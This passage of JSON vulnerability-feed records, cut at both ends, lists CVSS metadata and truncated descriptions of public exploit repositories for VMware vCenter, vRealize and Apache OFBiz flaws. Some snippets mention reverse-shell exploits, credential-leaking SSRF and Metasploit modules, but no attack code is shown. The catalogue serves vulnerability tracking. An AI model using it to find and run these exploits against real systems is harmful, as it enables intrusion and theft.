"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-27T00:00:00", "type": "checkpoint_advisories", "title": "VMWare vCenter Server Arbitrary File Upload (CVE-2021-22005)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T00:00:00", "id": "CPAI-2021-0728", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-07-20T11:31:08", "description": "# CVE-2021-26295-POC\r\n\r\n\u5229\u7528DNSlog\u8fdb\u884cCVE-2021-26...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-23T15:25:01", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Ofbiz", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2022-07-20T07:41:03", "id": "DFD57FC3-633C-5613-9AAB-EFE75EBB4A9C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-14T03:35:58", "description": "# CVE-2021-26295-Apac...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-24T08:25:04", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Ofbiz", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2022-01-13T12:15:38", "id": "C43D1529-7393-5DA8-AEA7-4ED3D87FB150", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:39:41", "description": "# Apache OFBiz rmi\u53cd\u5e8f\u5217\u5316EXP(CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-14T10:10:40", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Ofbiz", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-12-15T14:41:52", "id": "6259E530-C5D5-5A0A-8EDD-D07ADFD93494", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:37:39", "description": "# CVE-2021-26295\n\n**CVE-2021-26295 EXP \u53ef\u6210\u529f\u53cd\u5f39Shell**\n\n> **\u672c\u6587\u4ee5\u53ca\u5de5\u5177\u4ec5...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-24T10:08:54", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Ofbiz", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-12-15T14:41:43", "id": "44857A61-F0F0-54D6-AB53-4F157029BBC2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-21T15:56:32", "description": "# VMWare-vRealize-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T12:56:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-05-21T13:18:48", "id": "1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-30T20:26:21", "description": "# CVE-2021-21975\nNmap script to check vulnerability CVE-2021-219...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-01T21:59:05", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-30T17:32:47", "id": "7A372D54-3708-5032-B00A-2B54C2137FB7", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-23T13:06:08", "description": "# CVE-2021-21975\n\n#SSRF-POC - ssrf to cred leak\n\n#First configur...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T13:33:45", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-23T07:58:27", "id": "35114B1B-006F-5732-8E42-9E8643B61C2A", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# VMWare-CVE-2021-21975\n\n# VMWare-CVE-2021-21975 SSRF vulnerabil...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-10T12:36:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2021-12-03T00:24:52", "id": "7663BC50-C08E-5741-B771-BE50606E7B78", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-06-28T20:31:25", "description": "# CVE-2021-22005-metasploit\nthe metasploit script(POC/EXP) about...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-02T07:32:04", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-06-28T16:06:55", "id": "D7E6498B-522A-5F6E-ADCF-45E60A0788D9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-16T20:01:22", "description": "# CVE-2021-22005-\nCVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-25T07:19:42", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-07-16T13:57:16", "id": "97046A6F-8428-5DCF-88B4-4101351D637C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T23:03:13", "description": "# VMWare-C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T19:11:22", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-08-17T19:20:50", "id": "5ADFCBCF-BEC4-5B45-818D-9C25EAF0F9AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:04:56", "description": "# CVE-2021-22005\n\nVMware vCenter RCE CVE-2021-22005 one-liner ma...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:09:03", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-13T21:13:47", "id": "B31B0189-453E-5CA5-8FF3-5DC05043BE98", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-31T08:46:10", "description": "# cve-2021-22005-exp\n\n## 0x01 \u6f0f\u6d1e\u7b80\u4ecb\n2021\u5e749\u670821\u65e5\uff0cVMware\u53d1\u5e03\u5b89\u5168\u516c\u544a\uff0c\u516c\u5f00\u62ab\u9732\u4e86...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-18T08:18:50", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2023-05-31T06:39:39", "id": "D97D0E5A-B60D-5B5B-93AC-3D6249E5A9C5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:44:58", "description": "# CVE-2021-22005\n# VMware vCenter Server\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\n\n## Code By:Jun...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T08:36:21", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2023-02-27T01:06:12", "id": "AEAB39A1-AAEB-53A6-836E-E4994CBDABF7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-13T17:42:26", "description": "# CVE-2021-22005 - VMWare vCenter Server File Upload to RCE\n####...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-25T16:21:56", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-08-13T15:06:43", "id": "AAD2737A-E98E-59B4-8310-3DF28159B7F4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:45:35", "description": "# CVE-2021-22005-metasploit\nthe metasploit script(POC/EXP) about...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-24T23:14:01", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-11-09T18:14:11", "id": "6E42EC2D-B570-5376-884C-7C0566A1CA3D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T14:15:18", "description": "# CVE-2021-22005poc\nCVE-2021-22005 vcenter\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6279\u91cf\u9a8c\u8bc1poc\n\n\n\u4e00\u3001\u7528\u6cd5\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-15T13:11:04", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-03-15T03:51:38", "id": "9B660139-27C8-56B8-B9E2-8124D0E9F502", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T18:53:42", "description": "# ofbiz-poc\nCVE-2020-9496\u548cCVE_2020_9496\u5229\u7528dnslog\u6279\u91cf\u9a8c\u8bc1\u6f0f\u6d1e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-13T13:28:15", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Ofbiz", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9496", "CVE-2021-26295"], "modified": "2022-01-11T08:40:28", "id": "29FE8BBC-6003-591C-8E89-6836D0994CF1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "<b>[CVE-2021-21975] VMware vRealize Operations Manager API Serve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": 